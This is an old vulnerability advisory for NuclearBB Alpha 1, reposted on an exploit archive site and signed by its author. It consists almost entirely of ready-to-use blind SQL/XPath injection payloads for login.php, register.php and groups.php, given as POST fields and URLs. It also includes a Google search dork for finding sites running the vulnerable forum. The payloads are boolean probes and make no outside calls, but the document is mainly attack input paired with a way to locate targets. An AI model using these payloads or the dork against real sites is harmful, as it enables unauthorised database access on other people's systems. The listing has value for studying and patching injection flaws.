Home / os / blackberry

nuclearbb-sql.txt

Posted on 19 April 2007

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities Vulnerable: NuclearBB Alpha 1 Google d0rk: "This forum is powered by NuclearBB" ============= String Inputs ============= ---------------------------- login.php - $_POST['submit'] ---------------------------- username=xyz password=passxyz submit=Login"+and+"1"="0 -------------------------------- register.php - $_POST['website'] -------------------------------- username=xyz@xyz.com email=xyz@xyz.com pass1=passwordxyz pass2=passwordxyz website=xyz@xyz.com"+and+"1"="0 location=xyz@xyz.com msn=xyz@xyz.com yahoo=xyz@xyz.com aol=xyz@xyz.com icq=xyz@xyz.com signature=xyz@xyz.com coppa_state=over register_submit=Register ---------------------------- register.php - $_POST['aol'] ---------------------------- username=xyz@xyz.com email=xyz@xyz.com pass1=xyz@xyz.com pass2=xyz@xyz.com website=xyz@xyz.com location=xyz@xyz.com msn=xyz@xyz.com yahoo=xyz@xyz.com aol=xyz@xyz.com"+and+"1"="0 icq=xyz@xyz.com signature=xyz@xyz.com coppa_state=over register_submit=Register ---------------------------------- register.php - $_POST['signature'] ---------------------------------- username=xyz@xyz.com email=xyz@xyz.com pass1=xyz@xyz.com pass2=xyz@xyz.com website=xyz@xyz.com location=xyz@xyz.com msn=xyz@xyz.com yahoo=xyz@xyz.com aol=xyz@xyz.com icq=xyz@xyz.com signature=xyz@xyz.com"+and+"1"="0 coppa_state=over register_submit=Register ============== Numeric Inputs ============== ----------------------- groups.php - $_GET['g'] ----------------------- http://www.example.com/groups.php?g=1+and+1=0 ------------------------------ register.php - $_POST['email'] ------------------------------ username=xyz@xyz.com email=xyz@xyz.com+and+1=0 pass1=xyz@xyz.com pass2=xyz@xyz.com website=xyz@xyz.com location=xyz@xyz.com msn=xyz@xyz.com yahoo=xyz@xyz.com aol=xyz@xyz.com icq=xyz@xyz.com signature=xyz@xyz.com coppa_state=over&register_submit=Register John Martinelli john@martinelli.com http://john-martinelli.com April 18th, 2007

 

TOP